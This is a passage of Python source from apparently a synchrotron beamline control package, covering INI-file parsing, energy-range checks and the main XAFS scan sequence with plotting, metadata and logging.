specified\\n'))\n return {}, {}\n if not os.path.isfile(inifile):\n print(error_msg('\\ninifile does not exist\\n'))\n return {}, {}\n\n config = configparser.ConfigParser(interpolation=None)\n config.read_file(open(inifile))\n\n found = dict()\n\n ## ----- scan regions (what about kwargs???)\n for a in ('bounds', 'steps', 'times'):\n found[a] = False\n parameters[a] = []\n if a not in kwargs:\n try:\n #for f in config.get('scan', a).split():\n for f in re.split('[ \\t,]+', config.get('scan', a).strip()):\n try:\n parameters[a].append(float(f))\n except:\n parameters[a].append(f)\n found[a] = True\n except:\n parameters[a] = getattr(BMMuser, a)\n else:\n this = str(kwargs[a])\n for f in this.split():\n try:\n parameters[a].append(float(f))\n except:\n parameters[a].append(f)\n found[a] = True\n parameters['bounds_given'] = parameters['bounds'].copy()\n\n (problem, text, reference) = 
sanitize_step_scan_parameters(parameters['bounds'], parameters['steps'], parameters['times'])\n if len(text) > 1:\n print(text)\n print(f'\\nsee: {reference}')\n if problem:\n return {}, {}\n\n ## ----- strings\n for a in ('folder', 'experimenters', 'element', 'edge', 'filename', 'comment',\n 'mode', 'sample', 'prep', 'url', 'doi', 'cif'):\n found[a] = False\n if a not in kwargs:\n try:\n parameters[a] = config.get('scan', a)\n found[a] = True\n except configparser.NoOptionError:\n parameters[a] = getattr(BMMuser, a)\n else:\n parameters[a] = str(kwargs[a])\n found[a] = True\n\n if not os.path.isdir(parameters['folder']):\n print(error_msg('\\nfolder %s does not exist\\n' % parameters['folder']))\n return {}, {}\n parameters['mode'] = parameters['mode'].lower()\n \n ## ----- start value\n if 'start' not in kwargs:\n try:\n parameters['start'] = str(config.get('scan', 'start'))\n found['start'] = True\n except configparser.NoOptionError:\n parameters[a] = getattr(BMMuser, a)\n else:\n parameters['start'] = str(kwargs['start'])\n found['start'] = True\n try:\n if parameters['start'] == 'next':\n parameters['start'] = next_index(parameters['folder'],parameters['filename'])\n else:\n parameters['start'] = int(parameters['start'])\n except ValueError:\n print(error_msg('\\nstart value must be a positive integer or \"next\"'))\n parameters['start'] = -1\n found['start'] = False\n\n ## ----- integers\n for a in ('nscans', 'npoints'):\n found[a] = False\n if a not in kwargs:\n try:\n parameters[a] = int(config.get('scan', a))\n found[a] = True\n except configparser.NoOptionError:\n parameters[a] = getattr(BMMuser, a)\n else:\n parameters[a] = int(kwargs[a])\n found[a] = True\n\n ## ----- floats\n for a in ('e0', 'energy', 'inttime', 'dwell', 'delay'):\n found[a] = False\n if a not in kwargs:\n try:\n parameters[a] = float(config.get('scan', a))\n found[a] = True\n except configparser.NoOptionError:\n parameters[a] = getattr(BMMuser, a)\n else:\n parameters[a] = 
float(kwargs[a])\n found[a] = True\n\n ## ----- booleans\n for a in ('snapshots', 'htmlpage', 'lims', 'bothways', 'channelcut', 'usbstick', 'rockingcurve', 'ththth', 'shutter'):\n found[a] = False\n if a not in kwargs:\n try:\n parameters[a] = config.getboolean('scan', a)\n found[a] = True\n except configparser.NoOptionError:\n parameters[a] = getattr(BMMuser, a)\n else:\n parameters[a] = bool(kwargs[a])\n found[a] = True\n if parameters['lims'] is False:\n parameters['htmlpage'] = False\n parameters['snapshots'] = False\n \n if dcm._crystal != '111' and parameters['ththth']:\n print(error_msg('\\nYou must be using the Si(111) crystal to make a Si(333) measurement\\n'))\n return {}, {}\n\n if not found['e0'] and found['element'] and found['edge']:\n parameters['e0'] = edge_energy(parameters['element'], parameters['edge'])\n if parameters['e0'] is None:\n print(error_msg('\\nCannot figure out edge energy from element = %s and edge = %s\\n' % (parameters['element'], parameters['edge'])))\n return {}, {}\n else:\n found['e0'] = True\n #print('\\nUsing tabulated value of %.1f for the %s %s edge\\n' % (parameters['e0'], parameters['element'], parameters['edge']))\n if parameters['e0'] > 23500:\n print(error_msg('\\nThe %s %s edge is at %.1f, which is ABOVE the measurement range for BMM\\n' %\n (parameters['element'], parameters['edge'], parameters['e0'])))\n return {}, {}\n if parameters['e0'] < 4000:\n print(error_msg('\\nThe %s %s edge is at %.1f, which is BELOW the measurement range for BMM\\n' %\n (parameters['element'], parameters['edge'], parameters['e0'])))\n return {}, {}\n\n \n return parameters, found\n\n\n\ndef channelcut_energy(e0, bounds, ththth):\n '''From the scan parameters, find the energy at the center of the angular range of the scan.\n If the center of the angular range is too close to (or below) e0, use 50 eV above e0.\n '''\n dcm = user_ns['dcm']\n for i,s in enumerate(bounds):\n if type(s) is str:\n this = float(s[:-1])\n bounds[i] = ktoe(this)\n 
amin = dcm.e2a(e0+bounds[0])\n amax = dcm.e2a(e0+bounds[-1])\n if ththth:\n amin = dcm.e2a((e0+bounds[0])/3.0)\n amax = dcm.e2a((e0+bounds[-1])/3.0)\n aave = amin + 1.0*(amax - amin) / 2.0\n wavelength = dcm.wavelength(aave)\n eave = e2l(wavelength)\n if eave < e0 + 30:\n eave = e0 + 50\n return eave\n\n\ndef attain_energy_position(value):\n '''Attempt to move to an energy position, attempting to deal\n gracefully with encoder loss on the Bragg axis.\n\n Argument\n ========\n value : (float) target energy value\n\n Returns True for success, False for failure\n '''\n dcm, dcm_bragg = user_ns['dcm'], user_ns['dcm_bragg']\n BMMuser = user_ns['BMMuser']\n dcm_bragg.clear_encoder_loss()\n yield from mv(dcm.energy, value)\n count = 0\n while abs(dcm.energy.position - value) > 0.1 :\n if count > 4:\n print(error_msg('Unresolved encoder loss on Bragg axis. Stopping XAFS scan.'))\n BMMuser.final_log_entry = False\n yield from null()\n return False\n print('Clearing encoder loss and re-trying movement to pseudo-channel-cut energy...')\n dcm_bragg.clear_encoder_loss()\n yield from sleep(2)\n yield from mv(dcm.energy, value)\n count = count + 1\n return True\n\n\ndef ini_sanity(found):\n '''Very simple sanity checking of the scan control file.'''\n ok = True\n missing = []\n for a in ('bounds', 'steps', 'times', 'e0', 'element', 'edge', 'filename', 'nscans', 'start'):\n if found[a] is False:\n ok = False\n missing.append(a)\n return (ok, missing)\n\n\n\n##########################################################\n# --- export a database energy scan entry to an XDI file #\n##########################################################\ndef db2xdi(datafile, key):\n '''\n Export a database entry for an XAFS scan to an XDI file.\n\n Parameters\n ----------\n datafile : str\n output file name\n key : str\n UID in database\n\n\n Examples\n --------\n\n >>> db2xdi('/path/to/myfile.xdi', 1533)\n\n >>> db2xdi('/path/to/myfile.xdi', '0783ac3a-658b-44b0-bba5-ed4e0c4e7216')\n\n '''\n BMMuser = 
user_ns['BMMuser']\n dfile = datafile\n if BMMuser.DATA not in dfile:\n if 'bucket' not in BMMuser.DATA:\n dfile = os.path.join(BMMuser.DATA, datafile)\n if os.path.isfile(dfile):\n print(error_msg('%s already exists! Bailing out....' % dfile))\n return\n header = db[key]\n ## sanity check, make sure that db returned a header AND that the header was an xafs scan\n write_XDI(dfile, header)\n print(bold_msg('wrote %s' % dfile))\n\n\n\n#########################\n# -- the main XAFS scan #\n#########################\ndef xafs(inifile=None, **kwargs):\n '''\n Read an INI file for scan matadata, then perform an XAFS scan sequence.\n '''\n def main_plan(inifile, **kwargs):\n if '311' in dcm._crystal and dcm_x.user_readback.get() < 10:\n BMMuser.final_log_entry = False\n print(error_msg('The DCM is in the 111 position, configured as 311'))\n print(error_msg('\\tdcm.x: %.2f mm\\t dcm._crystal: %s' % (dcm_x.user_readback.get(), dcm._crystal)))\n yield from null()\n return\n if '111' in dcm._crystal and dcm_x.user_readback.get() > 10:\n BMMuser.final_log_entry = False\n print(error_msg('The DCM is in the 311 position, configured as 111'))\n print(error_msg('\\tdcm_x: %.2f mm\\t dcm._crystal: %s' % (dcm_x.user_readback.get(), dcm._crystal)))\n yield from null()\n return\n\n \n verbose = False\n if 'verbose' in kwargs and kwargs['verbose'] is True:\n verbose = True\n \n supplied_metadata = dict()\n if 'md' in kwargs and type(kwargs['md']) == dict:\n supplied_metadata = kwargs['md']\n #if 'purpose' not in supplied_metadata:\n # this_purpose = purpose('xafs', 'scan_nd', )\n # supplied_metadata['purpose'] = 'xafs'\n\n if is_re_worker_active():\n BMMuser.prompt = False\n kwargs['force'] = True\n\n if verbose: print(verbosebold_msg('checking clear to start (unless force=True)')) \n if 'force' in kwargs and kwargs['force'] is True:\n (ok, text) = (True, '')\n else:\n (ok, text) = BMM_clear_to_start()\n if ok is False:\n BMMuser.final_log_entry = False\n print(error_msg('\\n'+text))\n 
print(bold_msg('Quitting scan sequence....\\n'))\n yield from null()\n return\n\n ## make sure we are ready to scan\n #yield from mv(_locked_dwell_time.quadem_dwell_time.settle_time, 0)\n #yield from mv(_locked_dwell_time.struck_dwell_time.settle_time, 0)\n _locked_dwell_time.quadem_dwell_time.settle_time = 0\n #_locked_dwell_time.struck_dwell_time.settle_time = 0\n\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## user input, find and parse the INI file\n if verbose: print(verbosebold_msg('time estimate')) \n inifile, estimate = howlong(inifile, interactive=False, **kwargs)\n if estimate == -1:\n BMMuser.final_log_entry = False\n yield from null()\n return\n (p, f) = scan_metadata(inifile=inifile, **kwargs)\n p['channelcut'] = True\n if p['lims'] is False:\n BMMuser.lims = False\n else:\n BMMuser.lims = True\n if not any(p): # scan_metadata returned having printed an error message\n return(yield from null())\n\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## if in xs mode, make sure we are configured correctly\n if plotting_mode(p['mode']) == 'xs' and use_4element is True:\n if (any(getattr(BMMuser, x) is None for x in ('element', 'xs1', 'xs2', 'xs3', 'xs4',\n 'xschannel1', 'xschannel2', 'xschannel3', 'xschannel4'))):\n print(error_msg('BMMuser is not configured to measure correctly with the Xspress3 and the 4-element detector'))\n print(error_msg('Likely solution:'))\n print(error_msg('Set element symbol: BMMuser.element = Fe # (or whatever...)'))\n print(error_msg('then do: xs.measure_roi()'))\n return(yield from null())\n if plotting_mode(p['mode']) == 'xs1' and use_1element is True:\n if (any(getattr(BMMuser, x) is None for x in ('element', 'xs8', 'xschannel8'))):\n print(error_msg('BMMuser is not configured to measure correctly with the Xspress3 and the 1-element detector'))\n print(error_msg('Likely solution:'))\n print(error_msg('Set element symbol: BMMuser.element = Fe # (or whatever...)'))\n print(error_msg('then do: 
xs.measure_roi()'))\n return(yield from null())\n\n sub_dict = {'*' : '_STAR_',\n '/' : '_SLASH_',\n '\\\\': '_BACKSLASH_',\n '?' : '_QM_',\n '%' : '_PERCENT_',\n ':' : '_COLON_',\n '|' : '_VERBAR_',\n '\"' : '_QUOTE_',\n '<' : '_LT_',\n '>' : '_GT_',\n }\n vfatify = lambda m: sub_dict[m.group()]\n if p['usbstick']:\n new_filename = re.sub(r'[*:?\"<>|/\\\\]', vfatify, p['filename'])\n if new_filename != p['filename']: \n report('\\nChanging filename from \"%s\" to %s\"' % (p['filename'], new_filename), 'error')\n print(error_msg('\\nThese characters cannot be in file names copied onto most memory sticks:'))\n print(error_msg('\\n\\t* : ? % \" < > | / \\\\'))\n print(error_msg('\\nSee ')+url_msg('https://en.wikipedia.org/wiki/Filename#Reserved_characters_and_words'))\n p['filename'] = new_filename\n\n ## 255 character limit for filenames on VFAT\n # if len(p['filename']) > 250:\n # BMMuser.final_log_entry = False\n # print(error_msg('\\nYour filename is too long,'))\n # print(error_msg('\\nFilenames longer than 255 characters cannot be copied onto most memory sticks,'))\n # yield from null()\n # return\n\n\n bail = False\n cnt = 0\n for i in range(p['start'], p['start']+p['nscans'], 1):\n cnt += 1\n fname = \"%s.%3.3d\" % (p['filename'], i)\n if p['usbstick']:\n fname = re.sub(r'[*:?\"<>|/\\\\]', vfatify, fname)\n datafile = os.path.join(p['folder'], fname)\n if os.path.isfile(datafile):\n report('%s already exists!' % (datafile), 'error')\n bail = True\n if bail:\n report('\\nOne or more output files already exist! 
Quitting scan sequence....\\n', 'error')\n BMMuser.final_log_entry = False\n yield from null()\n return\n\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## user verification (disabled by BMMuser.prompt)\n if verbose: print(verbosebold_msg('computing pseudo-channelcut energy'))\n eave = channelcut_energy(p['e0'], p['bounds'], p['ththth'])\n length = 0\n if BMMuser.prompt:\n BMMuser.instrument = '' # we are NOT using a spreadsheet, so unset instrument\n text = '\\n'\n for k in ('bounds', 'bounds_given', 'steps', 'times'):\n addition = ' %-13s : %-50s\\n' % (k,p[k])\n text = text + addition.rstrip() + '\\n'\n if len(addition) > length: length = len(addition)\n for (k,v) in p.items():\n if k in ('bounds', 'bounds_given', 'steps', 'times'):\n continue\n if k in ('npoints', 'dwell', 'delay', 'inttime', 'channelcut', 'bothways'):\n continue\n addition = ' %-13s : %-50s\\n' % (k,v)\n text = text + addition.rstrip() + '\\n'\n if len(addition) > length: length = len(addition)\n if length < 75: length = 75\n for k in ('post_webcam', 'post_anacam', 'post_usbcam1', 'post_usbcam2', 'post_xrf'):\n addition = ' %-13s : %-50s\\n' % (k,getattr(user_ns['BMMuser'], k))\n text = text + addition.rstrip() + '\\n'\n if len(addition) > length: length = len(addition)\n if length < 75: length = 75\n boxedtext('How does this look?', text, 'green', width=length+4) # see 05-functions\n\n outfile = os.path.join(p['folder'], \"%s.%3.3d\" % (p['filename'], p['start']))\n print('\\nFirst data file to be written to \"%s\"' % outfile)\n\n print(estimate)\n\n if not dcm.suppress_channel_cut:\n if p['ththth']:\n print('\\nSi(111) pseudo-channel-cut energy = %.1f ; %.1f on the Si(333)' % (eave,eave*3))\n else:\n print('\\nPseudo-channel-cut energy = %.1f' % eave)\n\n action = input(\"\\nBegin scan sequence? 
\" + PROMPT)\n if action != '':\n if action[0].lower() == 'n' or action[0].lower() == 'q':\n BMMuser.final_log_entry = False\n yield from null()\n return\n\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## gather up input data into a format suitable for the dossier\n with open(inifile, 'r') as fd: content = fd.read()\n output = re.sub(r'\\n+', '\\n', re.sub(r'\\#.*\\n', '\\n', content)) # remove comment and blank lines\n clargs = textwrap.fill(str(kwargs), width=50) # .replace('\\n', '
')\n BMM_log_info('starting XAFS scan using %s:\\n%s\\ncommand line arguments = %s' % (inifile, output, str(kwargs)))\n BMM_log_info(motor_status())\n\n ## perhaps enter pseudo-channel-cut mode\n ## need to do this define defining the plotting lambda otherwise\n ## BlueSky gets confused about the plotting window\n #if not dcm.suppress_channel_cut:\n if p['channelcut'] is True:\n report('entering pseudo-channel-cut mode at %.1f eV' % eave, 'bold')\n dcm.mode = 'fixed'\n yield from attain_energy_position(eave)\n\n # dcm_bragg.clear_encoder_loss()\n # #if 'noreturn' in kwargs and kwargs['noreturn'] is not True:\n # yield from mv(dcm.energy, eave)\n # count = 0\n # while abs(dcm.energy.position - eave) > 0.1 :\n # if count > 3:\n # print(error_msg('Unresolved encoder loss on Bragg axis. Stopping XAFS scan.'))\n # BMMuser.final_log_entry = False\n # yield from null()\n # return\n # print('Clearing encoder loss and re-trying to move to pseudo-channel-cut energy...')\n # dcm_bragg.clear_encoder_loss()\n # yield from mv(dcm.energy, eave)\n # count = count + 1\n \n if p['rockingcurve']:\n report('running rocking curve at pseudo-channel-cut energy %.1f eV' % eave, 'bold')\n yield from rocking_curve()\n close_last_plot()\n RE.msg_hook = None\n if p['channelcut'] is True:\n dcm.mode = 'channelcut'\n\n\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## organize metadata for injection into database and XDI output\n print(bold_msg('gathering metadata'))\n md = bmm_metadata(measurement = p['mode'],\n experimenters = p['experimenters'],\n edge = p['edge'],\n element = p['element'],\n edge_energy = p['e0'],\n direction = 1,\n scantype = 'step',\n channelcut = True, # p['channelcut'],\n mono = 'Si(%s)' % dcm._crystal,\n i0_gas = 'N2', #\\\n it_gas = 'N2', # > these three need to go into INI file\n ir_gas = 'N2', #/\n sample = p['sample'],\n prep = p['prep'],\n stoichiometry = None,\n mode = p['mode'],\n comment = p['comment'],\n ththth = p['ththth'],\n )\n\n \n ## 
--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## measure XRF spectrum at Eave\n if 'xs' in plotting_mode(p['mode']) and BMMuser.lims is True:\n yield from dossier.capture_xrf(p['folder'], p['filename'], p['mode'], md)\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## snap photos\n if p['snapshots']:\n yield from dossier.cameras(p['folder'], p['filename'], md)\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## capture dossier metadata for start document\n md['_snapshots'] = {**dossier.xrf_md, **dossier.cameras_md}\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## this dictionary is used to populate the static html page for this scan sequence\n # see https://stackoverflow.com/a/5445983 for list of string idiom\n these_kwargs = {'start' : p['start'],\n 'end' : p['start']+p['nscans']-1,\n 'pccenergy' : eave,\n 'bounds' : ' '.join(map(str, p['bounds_given'])),\n 'steps' : ' '.join(map(str, p['steps'])),\n 'times' : ' '.join(map(str, p['times'])), }\n dossier.prep_metadata(p, inifile, clargs, these_kwargs)\n\n with open(os.path.join(BMMuser.DATA, inifile)) as f:\n initext = ''.join(f.readlines())\n user_metadata = {**p, **these_kwargs, 'initext': initext, 'clargs': clargs}\n md['_user'] = user_metadata\n\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## set up a plotting subscription, anonymous functions for plotting various forms of XAFS\n\n # switch between old ion chambers with QuadEM and new self-contained ICs\n i0 = 'I0' # 'I0a' or 'I0b'\n it = 'It' # 'Ita' or 'Itb'\n ir = 'Ir' # 'Ira' or 'Irb'\n \n test = lambda doc: (doc['data']['dcm_energy'], doc['data'][i0])\n trans = lambda doc: (doc['data']['dcm_energy'], numpy.log(doc['data'][i0] / doc['data'][it]))\n ref = lambda doc: (doc['data']['dcm_energy'], numpy.log(doc['data'][it] / doc['data'][ir]))\n Yield = lambda doc: (doc['data']['dcm_energy'], doc['data']['Iy'] / doc['data'][i0])\n if user_ns['with_xspress3'] and plotting_mode(p['mode']) == 'xs':\n 
xspress3_4 = lambda doc: (doc['data']['dcm_energy'], (doc['data'][BMMuser.xs1] +\n doc['data'][BMMuser.xs2] +\n doc['data'][BMMuser.xs3] +\n doc['data'][BMMuser.xs4] ) / doc['data'][i0])\n if user_ns['with_xspress3'] and plotting_mode(p['mode']) == 'xs1':\n xspress3_1 = lambda doc: (doc['data']['dcm_energy'], doc['data'][BMMuser.xs8] / doc['data'][i0])\n \n if BMMuser.detector == 1:\n fluo = lambda doc: (doc['data']['dcm_energy'], doc['data'][BMMuser.dtc1] / doc['data'][i0])\n else:\n fluo = lambda doc: (doc['data']['dcm_energy'], (doc['data'][BMMuser.dtc1] +\n doc['data'][BMMuser.dtc2] + # removed doc['data'][BMMuser.dtc3] +\n doc['data'][BMMuser.dtc4]) / doc['data'][i0])\n if 'fluo' in p['mode'] or 'flou' in p['mode']:\n if user_ns['with_xspress3']:\n yield from mv(xs.cam.acquire_time, 0.5)\n plot = DerivedPlot(xspress3_4, xlabel='energy (eV)', ylabel='If / I0 (Xspress3)', title=p['filename'])\n else:\n plot = DerivedPlot(fluo, xlabel='energy (eV)', ylabel='absorption (fluorescence)', title=p['filename'])\n elif 'trans' in p['mode']:\n plot = DerivedPlot(trans, xlabel='energy (eV)', ylabel='absorption (transmission)', title=p['filename'])\n elif 'ref' in p['mode']:\n plot = DerivedPlot(ref, xlabel='energy (eV)', ylabel='absorption (reference)', title=p['filename'])\n elif 'yield' in p['mode']:\n quadem1.Iy.kind = 'hinted'\n plot = [DerivedPlot(Yield, xlabel='energy (eV)', ylabel='absorption (electron yield)', title=p['filename']),\n DerivedPlot(trans, xlabel='energy (eV)', ylabel='absorption (transmission)', title=p['filename'])]\n elif 'test' in p['mode']:\n plot = DerivedPlot(test, xlabel='energy (eV)', ylabel='I0 (test)', title=p['filename'])\n elif 'both' in p['mode']:\n if user_ns['with_xspress3']:\n yield from mv(xs.cam.acquire_time, 0.5)\n plot = [DerivedPlot(trans, xlabel='energy (eV)', ylabel='absorption (transmission)', title=p['filename']),\n DerivedPlot(xspress3_4, xlabel='energy (eV)', ylabel='absorption (Xspress3)', title=p['filename'])]\n else:\n 
plot = [DerivedPlot(trans, xlabel='energy (eV)', ylabel='absorption (transmission)', title=p['filename']),\n DerivedPlot(fluo, xlabel='energy (eV)', ylabel='absorption (fluorescence)', title=p['filename'])]\n elif 'xs1' in p['mode']:\n yield from mv(xs1.cam.acquire_time, 0.5)\n plot = DerivedPlot(xspress3_1, xlabel='energy (eV)', ylabel='If / I0 (Xspress3, 1-element)', title=p['filename'])\n elif 'xs' in p['mode']:\n yield from mv(xs.cam.acquire_time, 0.5)\n plot = DerivedPlot(xspress3_4, xlabel='energy (eV)', ylabel='If / I0 (Xspress3, 4-element)', title=p['filename'])\n else:\n print(error_msg('Plotting mode not specified, falling back to a transmission plot'))\n plot = DerivedPlot(trans, xlabel='energy (eV)', ylabel='absorption (transmission)', title=p['filename'])\n\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## engage suspenders right before starting scan sequence\n if 'force' in kwargs and kwargs['force'] is True:\n pass\n else:\n BMM_suspenders()\n\n ## This helped Bruce understand how to make a decorator conditional:\n ## https://stackoverflow.com/a/49204061\n def conditional_subs_decorator(function):\n if user_ns['BMMuser'].enable_live_plots is True:\n return subs_decorator(plot)(function)\n else:\n return function\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## begin the scan sequence with the plotting subscription\n @conditional_subs_decorator\n def scan_sequence(clargs): #, noreturn=False):\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## compute energy and dwell grids\n print(bold_msg('computing energy and dwell time grids'))\n (energy_grid, time_grid, approx_time, delta) = conventional_grid(p['bounds'], p['steps'], p['times'], e0=p['e0'], element=p['element'], edge=p['edge'], ththth=p['ththth'])\n if plotting_mode(p['mode']) == 'xs':\n yield from mv(xs.total_points, len(energy_grid))\n if plotting_mode(p['mode']) == 'xs1':\n yield from mv(xs1.total_points, len(energy_grid))\n if energy_grid is None or 
time_grid is None or approx_time is None:\n print(error_msg('Cannot interpret scan grid parameters! Bailing out....'))\n BMMuser.final_log_entry = False\n yield from null()\n return\n if any(t > 20 for t in time_grid):\n print(error_msg('Your scan asks for an integration time greater than 20 seconds, which the ion chamber electrometer cannot accommodate. Bailing out....'))\n BMMuser.final_log_entry = False\n yield from null()\n return\n if any(y > 23500 for y in energy_grid):\n print(error_msg('Your scan goes above 23500 eV, the maximum energy available at BMM. Bailing out....'))\n BMMuser.final_log_entry = False\n yield from null()\n return\n if dcm._crystal == '111' and any(y > 21200 for y in energy_grid):\n print(error_msg('Your scan goes above 21200 eV, the maximum energy value on the Si(111) mono. Bailing out....'))\n BMMuser.final_log_entry = False\n yield from null()\n return\n if dcm._crystal == '111' and any(y < 2900 for y in energy_grid): # IS THIS CORRECT???\n print(error_msg('Your scan goes below 2900 eV, the minimum energy value on the Si(111) mono. Bailing out....'))\n BMMuser.final_log_entry = False\n yield from null()\n return\n if dcm._crystal == '311' and any(y < 5500 for y in energy_grid):\n print(error_msg('Your scan goes below 5500 eV, the minimum energy value on the Si(311) mono. 
Bailing out....'))\n BMMuser.final_log_entry = False\n yield from null()\n return\n\n\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## show the metadata to the user\n display_XDI_metadata(md)\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## store data in redis, used by cadashboard\n rkvs.set('BMM:scan:type', 'xafs')\n rkvs.set('BMM:scan:starttime', str(datetime.datetime.timestamp(datetime.datetime.now())))\n rkvs.set('BMM:scan:estimated', (approx_time * int(p['nscans']) * 60))\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## loop over scan count\n if BMMuser.enable_live_plots: close_last_plot()\n dossier.rid = str(uuid.uuid4())[:8]\n report(f'\"{p[\"filename\"]}\", {p[\"element\"]} {p[\"edge\"]} edge, {inflect(\"scans\", p[\"nscans\"])}',\n level='bold', slack=True, rid=dossier.rid)\n cnt = 0\n uidlist = []\n kafka_message({'xafs_sequence' : 'start',\n 'element' : p[\"element\"],\n 'edge' : p[\"edge\"],\n 'folder' : BMMuser.folder,\n 'repetitions' : p[\"nscans\"],\n 'mode' : p['mode']})\n refmat = 'none'\n if p[\"element\"] in user_ns['xafs_ref'].mapping:\n refmat = user_ns['xafs_ref'].mapping[p[\"element\"]][3]\n sample = p['sample']\n if len(sample) > 50:\n sample = sample[:45] + ' ...'\n kafka_message({'xafsscan': 'start',\n 'element': p[\"element\"],\n 'edge': p[\"edge\"],\n 'mode': p['mode'],\n 'filename': p[\"filename\"],\n 'repetitions': p[\"nscans\"],\n 'sample': sample,\n 'reference_material': refmat, })\n for i in range(p['start'], p['start']+p['nscans'], 1):\n cnt += 1\n fname = \"%s.%3.3d\" % (p['filename'], i)\n datafile = os.path.join(p['folder'], fname)\n if os.path.isfile(datafile):\n ## shouldn't be able to get here, unless a file\n ## was written since the scan sequence began....\n report('%s already exists! (How did that happen?) Bailing out....' % (datafile), 'error')\n yield from null()\n return\n\n \n ## this block is in the wrong place. 
should be outside the loop over repetitions\n ## same is true of several more things below\n slotno, ring = '', ''\n if 'wheel' in BMMuser.instrument.lower():\n slotno = f', slot {xafs_wheel.current_slot()}'\n ring = f' {xafs_wheel.slot_ring()} ring'\n dossier.instrument = xafs_wheel.dossier_entry();\n elif 'glancing angle' in BMMuser.instrument.lower():\n slotno = f', spinner {ga.current()}'\n dossier.instrument = ga.dossier_entry();\n elif 'lakeshore' in BMMuser.instrument.lower():\n slotno = f', temperature {lakeshore.readback.get():.1f}'\n dossier.instrument = lakeshore.dossier_entry();\n elif 'linkam' in BMMuser.instrument.lower():\n slotno = f', temperature {linkam.readback.get():.1f}'\n dossier.instrument = linkam.dossier_entry();\n # this one is a bit different, get dossier entry from gmb object,\n # there is no grid object....\n elif 'grid' in BMMuser.instrument.lower():\n slotno = f', motor grid {gmb.motor1.name}, {gmb.motor2.name} = {gmb.position1:.1f}, {gmb.position2:.1f}'\n dossier.instrument = gmb.dossier_entry();\n\n \n report(f'starting repetition {cnt} of {p[\"nscans\"]} -- {fname} -- {len(energy_grid)} energy points{slotno}{ring}', level='bold', slack=True)\n md['_filename'] = fname\n\n if plotting_mode(p['mode']) == 'xs':\n yield from mv(xs.spectra_per_point, 1) \n yield from mv(xs.total_points, len(energy_grid))\n hdf5_uid = xs.hdf5.file_name.value\n if plotting_mode(p['mode']) == 'xs1':\n yield from mv(xs1.spectra_per_point, 1) \n yield from mv(xs1.total_points, len(energy_grid))\n hdf5_uid = xs1.hdf5.file_name.value\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## compute trajectory\n energy_trajectory = cycler(dcm.energy, energy_grid)\n dwelltime_trajectory = cycler(dwell_time, time_grid)\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## need to set certain metadata items on a per-scan basis... temperatures, ring stats\n ## mono direction, ... 
things that can change during or between scan sequences\n \n md['Mono']['direction'] = 'forward'\n if p['bothways'] and cnt%2 == 0:\n energy_trajectory = cycler(dcm.energy, energy_grid[::-1])\n dwelltime_trajectory = cycler(dwell_time, time_grid[::-1])\n md['Mono']['direction'] = 'backward'\n yield from attain_energy_position(energy_grid[-1]+5)\n #dcm_bragg.clear_encoder_loss()\n #yield from mv(dcm.energy, energy_grid[-1]+5)\n else:\n ## if not measuring in both direction, lower acceleration of the mono\n ## for the rewind, explicitly rewind, then reset for measurement\n yield from mv(dcm_bragg.acceleration, BMMuser.acc_slow)\n print(whisper(' Rewinding DCM to %.1f eV with acceleration time = %.2f sec' % (energy_grid[0]-5, dcm_bragg.acceleration.get())))\n yield from attain_energy_position(energy_grid[0]-5)\n #dcm_bragg.clear_encoder_loss()\n #yield from mv(dcm.energy, energy_grid[0]-5)\n yield from mv(dcm_bragg.acceleration, BMMuser.acc_fast)\n print(whisper(' Resetting DCM acceleration time to %.2f sec' % dcm_bragg.acceleration.get()))\n \n rightnow = metadata_at_this_moment() # see metadata.py\n for family in rightnow.keys(): # transfer rightnow to md\n if type(rightnow[family]) is dict:\n if family not in md:\n md[family] = dict()\n for k in rightnow[family].keys():\n md[family][k] = rightnow[family][k]\n \n md['_kind'] = 'xafs'\n md['_pccenergy'] = round(eave, 3)\n\n if p['ththth']: md['_kind'] = '333'\n if plotting_mode(p['mode']) == 'xs1':\n md['_dtc'] = (BMMuser.xs8,)\n elif plotting_mode(p['mode']) == 'xs':\n md['_dtc'] = (BMMuser.xs1, BMMuser.xs2, BMMuser.xs3, BMMuser.xs4)\n else:\n md['_dtc'] = (BMMuser.dtc1, BMMuser.dtc2, BMMuser.dtc3, BMMuser.dtc4)\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## metadata for XDI entry in start document\n xdi = {'XDI': md}\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## call the stock scan_nd plan with the correct detectors\n uid = None\n more_kafka = {'filename': p[\"filename\"],\n 
